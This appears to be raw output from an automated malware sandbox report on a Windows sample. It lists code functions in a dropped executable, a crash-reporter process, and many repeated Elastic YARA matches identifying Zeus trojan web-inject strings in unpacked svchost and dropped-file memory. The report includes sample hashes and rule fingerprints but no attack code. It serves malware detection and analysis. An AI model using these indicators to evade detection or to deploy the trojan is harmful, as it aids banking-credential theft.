Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030ABA6010_2_030ABA60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AF28010_2_030AF280
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0309E98010_2_0309E980
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030B099D10_2_030B099D
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AA19010_2_030AA190
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03097F6010_2_03097F60
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03073FB010_2_03073FB0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03078FC010_2_03078FC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030B6FE310_2_030B6FE3
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AAE0010_2_030AAE00
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AC6C010_2_030AC6C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A56D010_2_030A56D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A36F010_2_030A36F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03078DA010_2_03078DA0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030AE4E010_2_030AE4E0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_030A54F010_2_030A54F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 764
Source: WlCVLbzNph.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.3.svchost.exe.886000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 20.2.nPtwtzGyOdAtB.exe.13a2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.nPtwtzGyOdAtB.exe.2f62000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.nPtwtzGyOdAtB.exe.e72000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.nPtwtzGyOdAtB.exe.2cf0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.nPtwtzGyOdAtB.exe.2b52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.47.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nPtwtzGyOdAtB.exe.26b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.WlCVLbzNph.exe.407000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.nPtwtzGyOdAtB.exe.3160000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nPtwtzGyOdAtB.exe.1380000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.WlCVLbzNph.exe.5c82a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.44.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.5830000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nPtwtzGyOdAtB.exe.1202000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nPtwtzGyOdAtB.exe.2a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.WlCVLbzNph.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.nPtwtzGyOdAtB.exe.e72000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.46.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nPtwtzGyOdAtB.exe.2d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nPtwtzGyOdAtB.exe.1012000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
